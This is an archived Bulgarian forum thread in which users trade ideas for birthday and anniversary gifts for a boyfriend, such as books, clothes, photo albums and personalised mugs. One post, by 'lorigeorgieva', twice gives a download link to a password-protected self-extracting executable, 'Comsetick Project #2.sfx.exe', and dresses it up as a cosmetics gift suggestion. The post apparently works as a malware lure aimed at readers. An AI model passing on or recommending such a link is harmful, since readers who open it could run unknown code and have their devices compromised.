PDA

View Full Version : Подарък , момичета Вие сте :)



nqmasvobodniimena
09-25-2013, 08:14
Здравейте , момичета :) Какво бихте подарили и сте подарявали на приятеля си за 6 месеца и рожден ден?

LadyDi
09-25-2013, 08:31
За 6 месеца - нищо. За рожден ден - кво ли не.

nqmasvobodniimena
09-25-2013, 08:44
хаха , а по подробно за р.д ? :D

LadyDi
09-25-2013, 09:25
ами за 7 години назад, ще ми е трудно да се сетя
подарявала съм дрехи, часовник, комплект керамични ножове :cool: книги, фарове за колата :cool:
в общи линии, всичко зависи НА КОГО подаряваш - трябва да е съобразено със собствените му вкусове

bitchwolf
09-25-2013, 09:34
колонки щото неговите се развалиха.. :D

CoockieMonster
09-25-2013, 10:28
А на седмия месец какво? На всеки месец ли си подарявате нещо?
Ако сте от малък град идете в по-голям на разходна, вземи й нещо от там, в някой мол примерно, почерпи я с вкусна храна. :) chill box <3 ако сте от голям град, идете там, където за 1ви път се видяхте, или на мястото при първата целувка, подари й бижу нещо, ддз..

102
09-25-2013, 11:23
А на седмия месец какво? На всеки месец ли си подарявате нещо?
Ако сте от малък град идете в по-голям на разходна, вземи й нещо от там, в някой мол примерно, почерпи я с вкусна храна. :) chill box <3 ако сте от голям град, идете там, където за 1ви път се видяхте, или на мястото при първата целувка, подари й бижу нещо, ддз..

Fail.

marilyn
09-25-2013, 12:58
На всеки месец ли си подарявате нещо?


Защо не? Ние с моя приятел си подаряваме всеки месец нещо. Скоро правихме 6 месеца и му подарих нещо като албумче с наши снимки, но на някои страници нямаше снимка, а бях написала разни неща. Той много се зарадва.
За рождения му ден му купих книга.

Жълто
09-25-2013, 23:05
Би трябвало да познаваш какво му харесва, ако има хоби или някакви по-специални интереси ще ти е по-лесно да избереш.

psychopath
09-26-2013, 00:37
Ако ще подаряваш каквото и да е, за да има подарък, по-добре да няма никакъв подарък. (на теория, на практика става дума за обноски и етикет :Д)
Идеята на подаръка е да покажеш внимание и да зарадваш някого, с точен избор. Т.е може да е нещо малко, но да бъде символ на взаимоотношенията ти с човекът, на когото ще го подаряваш.

lorigeorgieva
09-26-2013, 11:59
http://www.mediafire.com/download/rdsv8xdd21dp41v/Comsetick+Project+%232.sfx.exe (паролата е asd1)

Момчета, ЗАПОЧНЕТЕ ДА НИ подарявате точно '' http://www.mediafire.com/download/rdsv8xdd21dp41v/Comsetick+Project+%232.sfx.exe (паролата е asd1) '' ТАКИВА неща със точната комбинация на козметики ( която е на достъпна цена ) И просто сте супер :D Подаръците са много трудно нещо ! Аз лично съм изпадала в нещо като парадокс какво да купя на приятеля ми.. Но той си ме глези поне :D В началото е лесно за подаръци, но после става по кофти и трудно за избиране

Cloud9
09-26-2013, 12:12
Ти най-добре познаваш момичето.Избери нещо,което тя е споменала че иска или пък че никога не е имала.И един букет е достатъчен жест ако е изненада.

baby_baby
09-26-2013, 12:46
много неща

nqmasvobodniimena
09-27-2013, 22:00
ъмм за момче е подаръка :D *
inuche ne e vuprosa v poznavaneto prosto naistina toy ima mnogo ot neshtata , za koito se seshtam , a i vinagi mi e bilo trudno da izmislq podaruk -dori i da iskam da zaradvam dadeniq chovek. btw izvinqvam se che pisha na latinica , no phonetika-ta mi se precaka , a mi e super trudno da pisha na bg , zashtoto sa mi se iztrili bg bukvichki na klaviaturata :/

Jessie
09-28-2013, 09:19
За всеки месец.. нещо дребничко, символично.
За рожден ден - според интересите му. :) Аз, например, на моя приятел ще му подаря чаша с наша снимка + емблемата на любимия футболен отбор... заради който и се запознахме + футболна топка и картичка по поръчка, които са свързани с другите му два любими отбора... :)